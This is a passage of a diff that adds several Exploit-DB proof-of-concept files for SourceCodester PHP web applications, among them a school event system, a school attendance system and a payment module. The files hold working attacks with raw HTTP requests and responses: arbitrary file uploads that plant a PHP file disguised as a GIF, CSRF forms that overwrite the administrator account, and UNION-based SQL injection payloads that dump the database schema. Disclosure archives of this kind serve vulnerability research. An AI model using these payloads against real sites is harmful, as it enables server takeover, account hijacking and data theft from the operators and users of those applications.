User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3
|
||||
Connection: keep-alive
|
||||
HTTP/1.1 200 OK
|
||||
Date: Sun, 28 Oct 2018 17:16:52 GMT
|
||||
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
|
||||
X-Powered-By: PHP/5.6.30
|
||||
Expires: Thu, 19 Nov 1981 08:52:00 GMT
|
||||
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
|
||||
Pragma: no-cache
|
||||
Keep-Alive: timeout=5, max=100
|
||||
Connection: Keep-Alive
|
||||
Transfer-Encoding: chunked
|
||||
Content-Type: text/html; charset=UTF-8
|
89
exploits/php/webapps/45723.txt
Normal file
89
exploits/php/webapps/45723.txt
Normal file
|
@ -0,0 +1,89 @@
|
|||
# Exploit Title: School Event Management System 1.0 - Arbitrary File Upload
|
||||
# Dork: N/A
|
||||
# Date: 2018-10-29
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Vendor Homepage: https://www.sourcecodester.com/users/janobe
|
||||
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/sems_1.zip
|
||||
# Version: 1.0
|
||||
# Category: Webapps
|
||||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||||
# CVE: CVE-2018-18793
|
||||
|
||||
# POC:
|
||||
# 1)
|
||||
# http://localhost/[PATH]/event/controller.php?action=photos
|
||||
#
|
||||
GIFefe
|
||||
<?php
|
||||
.....
|
||||
?>
|
||||
# http://localhost/[PATH]/event/photo/[FILE]
|
||||
#
|
||||
#[PATH]/event/controller.php
|
||||
#....
|
||||
#29 function doInsert(){
|
||||
#30 if(isset($_POST['save'])){
|
||||
#31
|
||||
#32
|
||||
#33 $errofile = $_FILES['image']['error'];
|
||||
#34 $type = $_FILES['image']['type'];
|
||||
#35 $temp = $_FILES['image']['tmp_name'];
|
||||
#36 $myfile =$_FILES['image']['name'];
|
||||
#37 $location="photo/".$myfile;
|
||||
#38
|
||||
#39 @$file=$_FILES['image']['tmp_name'];
|
||||
#40 @$image= addslashes(file_get_contents($_FILES['image']['tmp_name']));
|
||||
#41 @$image_name= addslashes($_FILES['image']['name']);
|
||||
#42 @$image_size= getimagesize($_FILES['image']['tmp_name']);
|
||||
#....
|
||||
GET /[PATH]/event/controller.php?action=photos HTTP/1.1
|
||||
Host: TARGET
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3
|
||||
Connection: keep-alive
|
||||
Content-Type: multipart/form-data; boundary=
|
||||
---------------------------3634372676911755021110261466
|
||||
Content-Length: 617
|
||||
-----------------------------3634372676911755021110261466
|
||||
Content-Disposition: form-data; name="EventID"
|
||||
1
|
||||
-----------------------------3634372676911755021110261466
|
||||
Content-Disposition: form-data; name="MAX_FILE_SIZE"
|
||||
1000000
|
||||
-----------------------------3634372676911755021110261466
|
||||
Content-Disposition: form-data; name="photo"; filename="phpinfo_gif.php"
|
||||
Content-Type: application/force-download
|
||||
GIFefe
|
||||
<?php
|
||||
phpinfo();
|
||||
?>
|
||||
-----------------------------3634372676911755021110261466
|
||||
Content-Disposition: form-data; name="savephoto"
|
||||
-----------------------------3634372676911755021110261466--
|
||||
HTTP/1.1 200 OK
|
||||
Date: Sun, 28 Oct 2018 17:27:54 GMT
|
||||
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
|
||||
X-Powered-By: PHP/5.6.30
|
||||
Expires: Thu, 19 Nov 1981 08:52:00 GMT
|
||||
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
|
||||
Pragma: no-cache
|
||||
Content-Length: 143
|
||||
Keep-Alive: timeout=5, max=100
|
||||
Connection: Keep-Alive
|
||||
Content-Type: text/html; charset=UTF-8
|
||||
|
||||
# POC:
|
||||
# 2)
|
||||
<html>
|
||||
<body>
|
||||
<form action="http://localhost/[PATH]/event/controller.php?action=photos" enctype="multipart/form-data" method="post">
|
||||
<input name="EventID" id="EventID" value="1" type="hidden">
|
||||
<input name="MAX_FILE_SIZE" value="1000000" type="hidden">
|
||||
<input id="photo" name="photo" type="file">
|
||||
<button name="savephoto" type="submit">Upload Photo</button>
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
84
exploits/php/webapps/45724.txt
Normal file
84
exploits/php/webapps/45724.txt
Normal file
|
@ -0,0 +1,84 @@
|
|||
# Exploit Title: School Event Management System 1.0 - Cross-Site Request Forgery (Update Admin)
|
||||
# Dork: N/A
|
||||
# Date: 2018-10-29
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Vendor Homepage: https://www.sourcecodester.com/users/janobe
|
||||
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/sems_1.zip
|
||||
# Version: 1.0
|
||||
# Category: Webapps
|
||||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||||
# CVE: CVE-2018-18794
|
||||
|
||||
# POC:
|
||||
# 1)
|
||||
# .../[PATH]user/user/edit.php
|
||||
#02 if (!isset($_SESSION['ACCOUNT_ID'])){
|
||||
#03 redirect(web_root."index.php");
|
||||
#04 }
|
||||
#05
|
||||
#06 @$USERID = $_GET['id'];
|
||||
#07 if($USERID==''){
|
||||
#08 redirect("index.php");
|
||||
#09 }
|
||||
#10 $user = New User();
|
||||
#11 $singleuser = $user->single_user($USERID);
|
||||
# .../[PATH]user/controller.php
|
||||
#80 $user = New User();
|
||||
#81 $user->ACCOUNT_NAME = $_POST['U_NAME'];
|
||||
#82 $user->ACCOUNT_USERNAME = $_POST['U_USERNAME'];
|
||||
#83 $user->ACCOUNT_PASSWORD =sha1($_POST['U_PASS']);
|
||||
#84 $user->ACCOUNT_TYPE = $_POST['U_ROLE'];
|
||||
#85 $user->update($_POST['USERID']);
|
||||
#86
|
||||
#87 message("[". $_POST['U_NAME'] ."] has been updated!", "success");
|
||||
#88 redirect("index.php");
|
||||
# ...
|
||||
<html>
|
||||
<body>
|
||||
<form action="http://localhost/[PATH]/user/controller.php?action=edit" method="POST">
|
||||
<input id="USERID" name="USERID" placeholder="Account Id" type="Hidden" value="1">
|
||||
<input name="U_NAME" placeholder="Account Name" type="text" value="admin">
|
||||
|
||||
<input name="deptid" type="hidden" value="">
|
||||
<input name="U_USERNAME" placeholder="Username" type="text" value="admin">
|
||||
|
||||
<input name="deptid" type="hidden" value="">
|
||||
<input name="U_PASS" placeholder="Account Password" type="Password" value="">
|
||||
<input name="deptid" type="hidden" value="">
|
||||
<input id="RU_PASS" name="RU_PASS" placeholder="Re-type Password" type="Password" value="">
|
||||
|
||||
<select name="U_ROLE" id="U_ROLE">
|
||||
<option value="Administrator">Administrator</option>
|
||||
<option value="SSG">SSG</option>
|
||||
</select>
|
||||
<button id="save" name="save" type="submit">Save</button>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
POST /[PATH]/user/controller.php?action=edit HTTP/1.1
|
||||
Host: 192.168.1.27
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3
|
||||
Connection: keep-alive
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 136
|
||||
USERID=1&U_NAME=admin_test&deptid=&U_USERNAME=admin_test&deptid=&U_PASS=admin_test&deptid=&RU_PASS=admin_test&U_ROLE=Administrator&save=
|
||||
HTTP/1.1 200 OK
|
||||
Date: Sun, 28 Oct 2018 17:57:48 GMT
|
||||
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
|
||||
X-Powered-By: PHP/5.6.30
|
||||
Expires: Thu, 19 Nov 1981 08:52:00 GMT
|
||||
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
|
||||
Pragma: no-cache
|
||||
Content-Length: 128
|
||||
Keep-Alive: timeout=5, max=100
|
||||
Connection: Keep-Alive
|
||||
Content-Type: text/html; charset=UTF-8
|
||||
|
||||
/* `exploitdb`.`useraccounts` */
|
||||
$useraccounts = array(
|
||||
array('ACCOUNT_ID' => '1','ACCOUNT_NAME' => 'admin_test','ACCOUNT_USERNAME' => 'admin_test','ACCOUNT_PASSWORD' => '3f72bcb53fb301af20d78d152456d901c30a43b3','ACCOUNT_TYPE' => 'Administrator','EMPID' => '1234','USERIMAGE' => 'photos/import2.png')
|
||||
);
|
84
exploits/php/webapps/45725.txt
Normal file
84
exploits/php/webapps/45725.txt
Normal file
|
@ -0,0 +1,84 @@
|
|||
# Exploit Title: School Attendance Monitoring System 1.0 - Cross-Site Request Forgery (Update Admin)
|
||||
# Dork: N/A
|
||||
# Date: 2018-10-29
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Vendor Homepage: https://www.sourcecodester.com/users/janobe
|
||||
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/attendancemonitoring.zip
|
||||
# Version: 1.0
|
||||
# Category: Webapps
|
||||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||||
# CVE: CVE-2018-18797
|
||||
|
||||
# POC:
|
||||
# 1)
|
||||
# .../[PATH]/user/user/edit.php
|
||||
#02 if (!isset($_SESSION['ACCOUNT_ID'])){
|
||||
#03 redirect(web_root."index.php");
|
||||
#04 }
|
||||
#05
|
||||
#06 @$USERID = $_GET['id'];
|
||||
#07 if($USERID==''){
|
||||
#08 redirect("index.php");
|
||||
#09 }
|
||||
#10 $user = New User();
|
||||
#11 $singleuser = $user->single_user($USERID);
|
||||
# .../[PATH]/user/controller.php
|
||||
#80 $user = New User();
|
||||
#81 $user->ACCOUNT_NAME = $_POST['U_NAME'];
|
||||
#82 $user->ACCOUNT_USERNAME = $_POST['U_USERNAME'];
|
||||
#83 $user->ACCOUNT_PASSWORD =sha1($_POST['U_PASS']);
|
||||
#84 $user->ACCOUNT_TYPE = $_POST['U_ROLE'];
|
||||
#85 $user->update($_POST['USERID']);
|
||||
#86
|
||||
#87 message("[". $_POST['U_NAME'] ."] has been updated!", "success");
|
||||
#88 redirect("index.php");
|
||||
# ...
|
||||
<html>
|
||||
<body>
|
||||
<form action="http://localhost/[PATH]/user/controller.php?action=edit" method="POST">
|
||||
<input id="USERID" name="USERID" placeholder="Account Id" type="Hidden" value="1">
|
||||
<input name="U_NAME" placeholder="Account Name" type="text" value="admin">
|
||||
|
||||
<input name="deptid" type="hidden" value="">
|
||||
<input name="U_USERNAME" placeholder="Username" type="text" value="admin">
|
||||
|
||||
<input name="deptid" type="hidden" value="">
|
||||
<input name="U_PASS" placeholder="Account Password" type="Password" value="">
|
||||
<input name="deptid" type="hidden" value="">
|
||||
<input id="RU_PASS" name="RU_PASS" placeholder="Re-type Password" type="Password" value="">
|
||||
|
||||
<select name="U_ROLE" id="U_ROLE">
|
||||
<option value="Administrator">Administrator</option>
|
||||
<option value="SSG">SSG</option>
|
||||
</select>
|
||||
<button id="save" name="save" type="submit">Save</button>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
POST /[PATH]/user/controller.php?action=edit HTTP/1.1
|
||||
Host: 192.168.1.27
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3
|
||||
Connection: keep-alive
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 136
|
||||
USERID=1&U_NAME=admin_test&deptid=&U_USERNAME=admin_test&deptid=&U_PASS=admin_test&deptid=&RU_PASS=admin_test&U_ROLE=Administrator&save=
|
||||
HTTP/1.1 200 OK
|
||||
Date: Sun, 28 Oct 2018 17:57:48 GMT
|
||||
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
|
||||
X-Powered-By: PHP/5.6.30
|
||||
Expires: Thu, 19 Nov 1981 08:52:00 GMT
|
||||
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
|
||||
Pragma: no-cache
|
||||
Content-Length: 128
|
||||
Keep-Alive: timeout=5, max=100
|
||||
Connection: Keep-Alive
|
||||
Content-Type: text/html; charset=UTF-8
|
||||
|
||||
/* `exploitdb`.`useraccounts` */
|
||||
$useraccounts = array(
|
||||
array('ACCOUNT_ID' => '1','ACCOUNT_NAME' => 'admin_test','ACCOUNT_USERNAME' => 'admin_test','ACCOUNT_PASSWORD' => '3f72bcb53fb301af20d78d152456d901c30a43b3','ACCOUNT_TYPE' => 'Administrator','EMPID' => '1234','USERIMAGE' => 'photos/import2.png')
|
||||
);
|
89
exploits/php/webapps/45726.txt
Normal file
89
exploits/php/webapps/45726.txt
Normal file
|
@ -0,0 +1,89 @@
|
|||
# Exploit Title: School Attendance Monitoring System 1.0 - Arbitrary File Upload
|
||||
# Dork: N/A
|
||||
# Date: 2018-10-29
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Vendor Homepage: https://www.sourcecodester.com/users/janobe
|
||||
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/attendancemonitoring.zip
|
||||
# Version: 1.0
|
||||
# Category: Webapps
|
||||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||||
# CVE: CVE-2018-18799
|
||||
|
||||
# POC:
|
||||
# 1)
|
||||
# http://localhost/[PATH]/event/controller.php?action=photos
|
||||
#
|
||||
GIFefe
|
||||
<?php
|
||||
.....
|
||||
?>
|
||||
# http://localhost/[PATH]/event/photo/[FILE]
|
||||
#
|
||||
#[PATH]/event/controller.php
|
||||
#....
|
||||
#29 function doInsert(){
|
||||
#30 if(isset($_POST['save'])){
|
||||
#31
|
||||
#32
|
||||
#33 $errofile = $_FILES['image']['error'];
|
||||
#34 $type = $_FILES['image']['type'];
|
||||
#35 $temp = $_FILES['image']['tmp_name'];
|
||||
#36 $myfile =$_FILES['image']['name'];
|
||||
#37 $location="photo/".$myfile;
|
||||
#38
|
||||
#39 @$file=$_FILES['image']['tmp_name'];
|
||||
#40 @$image= addslashes(file_get_contents($_FILES['image']['tmp_name']));
|
||||
#41 @$image_name= addslashes($_FILES['image']['name']);
|
||||
#42 @$image_size= getimagesize($_FILES['image']['tmp_name']);
|
||||
#....
|
||||
GET /[PATH]/event/controller.php?action=photos HTTP/1.1
|
||||
Host: TARGET
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3
|
||||
Connection: keep-alive
|
||||
Content-Type: multipart/form-data; boundary=
|
||||
---------------------------3634372676911755021110261466
|
||||
Content-Length: 617
|
||||
-----------------------------3634372676911755021110261466
|
||||
Content-Disposition: form-data; name="EventID"
|
||||
1
|
||||
-----------------------------3634372676911755021110261466
|
||||
Content-Disposition: form-data; name="MAX_FILE_SIZE"
|
||||
1000000
|
||||
-----------------------------3634372676911755021110261466
|
||||
Content-Disposition: form-data; name="photo"; filename="phpinfo_gif.php"
|
||||
Content-Type: application/force-download
|
||||
GIFefe
|
||||
<?php
|
||||
phpinfo();
|
||||
?>
|
||||
-----------------------------3634372676911755021110261466
|
||||
Content-Disposition: form-data; name="savephoto"
|
||||
-----------------------------3634372676911755021110261466--
|
||||
HTTP/1.1 200 OK
|
||||
Date: Sun, 28 Oct 2018 17:27:54 GMT
|
||||
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
|
||||
X-Powered-By: PHP/5.6.30
|
||||
Expires: Thu, 19 Nov 1981 08:52:00 GMT
|
||||
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
|
||||
Pragma: no-cache
|
||||
Content-Length: 143
|
||||
Keep-Alive: timeout=5, max=100
|
||||
Connection: Keep-Alive
|
||||
Content-Type: text/html; charset=UTF-8
|
||||
|
||||
# POC:
|
||||
# 2)
|
||||
<html>
|
||||
<body>
|
||||
<form action="http://localhost/[PATH]/event/controller.php?action=photos" enctype="multipart/form-data" method="post">
|
||||
<input name="EventID" id="EventID" value="1" type="hidden">
|
||||
<input name="MAX_FILE_SIZE" value="1000000" type="hidden">
|
||||
<input id="photo" name="photo" type="file">
|
||||
<button name="savephoto" type="submit">Upload Photo</button>
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
108
exploits/php/webapps/45727.txt
Normal file
108
exploits/php/webapps/45727.txt
Normal file
|
@ -0,0 +1,108 @@
|
|||
# Exploit Title: School Attendance Monitoring System 1.0 - SQL Injection
|
||||
# Dork: N/A
|
||||
# Date: 2018-10-29
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Vendor Homepage: https://www.sourcecodester.com/users/janobe
|
||||
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/attendancemonitoring.zip
|
||||
# Version: 1.0
|
||||
# Category: Webapps
|
||||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||||
# CVE: CVE-2018-18798
|
||||
|
||||
# POC:
|
||||
# 1)
|
||||
# http://localhost/[PATH]/student/index.php?view=view&id=[SQL]
|
||||
#
|
||||
#[PATH]/student/view.php
|
||||
#01 <?php
|
||||
#02 $student = New Student();
|
||||
#03 $res = $student->select_student($_GET['id']);
|
||||
#04
|
||||
#05
|
||||
#06 $course = New Course();
|
||||
#07 $resCourse = $course->single_course($res->CourseID);
|
||||
#08
|
||||
#09 ?>
|
||||
GET /[PATH]/student/index.php?view=view&id=-1%27++uniOn+seLecT+%31%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2d%2d%20%2d HTTP/1.1
|
||||
Host: TARGET
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3
|
||||
Connection: keep-alive
|
||||
HTTP/1.1 200 OK
|
||||
Date: Sun, 28 Oct 2018 19:37:01 GMT
|
||||
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
|
||||
X-Powered-By: PHP/5.6.30
|
||||
Expires: Thu, 19 Nov 1981 08:52:00 GMT
|
||||
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
|
||||
Pragma: no-cache
|
||||
Keep-Alive: timeout=5, max=100
|
||||
Connection: Keep-Alive
|
||||
Transfer-Encoding: chunked
|
||||
Content-Type: text/html; charset=UTF-8
|
||||
|
||||
# POC:
|
||||
# 2)
|
||||
# http://localhost/[PATH]/event/index.php?view=view&id=[SQL]
|
||||
#
|
||||
#[PATH]/event/view.php
|
||||
#01 <?php
|
||||
#02 $event = New Event();
|
||||
#03 $res = $event->single_event($_GET['id']);
|
||||
#04
|
||||
#05
|
||||
#06
|
||||
#07 ?>
|
||||
GET /[PATH]/event/index.php?view=view&id=-1%27++uniOn+seLecT+%31%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c%33%2c%34%2c%35%2c%36%2c%37%2d%2d%20%2d HTTP/1.1
|
||||
Host: TARGET
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3
|
||||
Connection: keep-alive
|
||||
HTTP/1.1 200 OK
|
||||
Date: Sun, 28 Oct 2018 17:12:15 GMT
|
||||
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
|
||||
X-Powered-By: PHP/5.6.30
|
||||
Expires: Thu, 19 Nov 1981 08:52:00 GMT
|
||||
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
|
||||
Pragma: no-cache
|
||||
Keep-Alive: timeout=5, max=100
|
||||
Connection: Keep-Alive
|
||||
Transfer-Encoding: chunked
|
||||
Content-Type: text/html; charset=UTF-8
|
||||
|
||||
# POC:
|
||||
# 3)
|
||||
# http://localhost/[PATH]/user/index.php?view=view&id=[SQL]
|
||||
#
|
||||
#[PATH]/user/view.php
|
||||
#01 <?php
|
||||
#02 $user = New User();
|
||||
#03 $res = $user->single_user($_GET['id']);
|
||||
#04
|
||||
#05
|
||||
#06
|
||||
#07 ?>
|
||||
GET /[PATH]/user/index.php?view=view&id=-1%27++uniOn+seLecT+%31%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c%33%2c%34%2c%35%2c%36%2c%37%2d%2d%20%2d HTTP/1.1
|
||||
Host: TARGET
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3
|
||||
Connection: keep-alive
|
||||
HTTP/1.1 200 OK
|
||||
Date: Sun, 28 Oct 2018 17:16:52 GMT
|
||||
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
|
||||
X-Powered-By: PHP/5.6.30
|
||||
Expires: Thu, 19 Nov 1981 08:52:00 GMT
|
||||
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
|
||||
Pragma: no-cache
|
||||
Keep-Alive: timeout=5, max=100
|
||||
Connection: Keep-Alive
|
||||
Transfer-Encoding: chunked
|
||||
Content-Type: text/html; charset=UTF-8
|
104
exploits/php/webapps/45728.txt
Normal file
104
exploits/php/webapps/45728.txt
Normal file
|
@ -0,0 +1,104 @@
|
|||
# Exploit Title: PayPal/Credit Card/Debit Card Payment 1.0 - SQL Injection
|
||||
# Dork: N/A
|
||||
# Date: 2018-10-29
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Vendor Homepage: https://www.sourcecodester.com/users/janobe
|
||||
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/tubigangarden.zip
|
||||
# Version: 1.0
|
||||
# Category: Webapps
|
||||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||||
# CVE: CVE-2018-18800
|
||||
|
||||
# POC:
|
||||
# 1)
|
||||
# http://localhost/[PATH]/index.php?p=accomodation&q=[SQL]
|
||||
#
|
||||
#[PATH]/accomodation.php
|
||||
#...
|
||||
#50 $query = "SELECT * FROM `tblroom` r ,`tblaccomodation` a WHERE r.`ACCOMID`=a.`ACCOMID` AND `ACCOMODATION`='" . $_GET['q'] . "' AND `NUMPERSON` = " . $_POST['person'];
|
||||
#51
|
||||
#52
|
||||
#53 }elseif(isset($_GET['q'])){
|
||||
#54
|
||||
#55 $query = "SELECT * FROM `tblroom` r ,`tblaccomodation` a WHERE r.`ACCOMID`=a.`ACCOMID` AND `ACCOMODATION`='" . $_GET['q'] . "'";
|
||||
#56
|
||||
#57
|
||||
#58
|
||||
#59 }
|
||||
#60
|
||||
#61 $accomodation = ' | ' . $_GET['q'];
|
||||
#62 ?>
|
||||
#...
|
||||
GET /[PATH]/index.php?p=accomodation&q=-Standard%20Room%27%20%20UNION(SELECT(1),(2),(3),(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x),(5),(6),(7),(8),(9),(10),(11),(12))--%20- HTTP/1.1
|
||||
Host: TARGET
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3
|
||||
Connection: keep-alive
|
||||
HTTP/1.1 200 OK
|
||||
Date: Sun, 28 Oct 2018 19:55:17 GMT
|
||||
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
|
||||
X-Powered-By: PHP/5.6.30
|
||||
Expires: Thu, 19 Nov 1981 08:52:00 GMT
|
||||
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
|
||||
Pragma: no-cache
|
||||
Keep-Alive: timeout=5, max=100
|
||||
Connection: Keep-Alive
|
||||
Transfer-Encoding: chunked
|
||||
Content-Type: text/html; charset=UTF-8
|
||||
|
||||
# POC:
|
||||
# 2)
|
||||
# http://localhost/[PATH]/index.php?p=rooms&q=[SQL]
|
||||
#
|
||||
#[PATH]/room_rates.php
|
||||
#...
|
||||
#50 $query = "SELECT * FROM `tblroom` r ,`tblaccomodation` a WHERE r.`ACCOMID`=a.`ACCOMID` AND `NUMPERSON` = " . $_POST['person'];
|
||||
#51
|
||||
#52
|
||||
#53 }elseif(isset($_GET['q'])){
|
||||
#54
|
||||
#55 $query = "SELECT * FROM `tblroom` r ,`tblaccomodation` a WHERE r.`ACCOMID`=a.`ACCOMID` AND `ROOM` LIKE '%" . $_GET['q'] . "%'";
|
||||
#56
|
||||
#57
|
||||
#58 }else{
|
||||
#59 $query = "SELECT * FROM `tblroom` r ,`tblaccomodation` a WHERE r.`ACCOMID`=a.`ACCOMID`";
|
||||
#60 }
|
||||
#61
|
||||
#62 $accomodation = ' | ' . @$_GET['q'];
|
||||
#63 ?>
|
||||
#...
|
||||
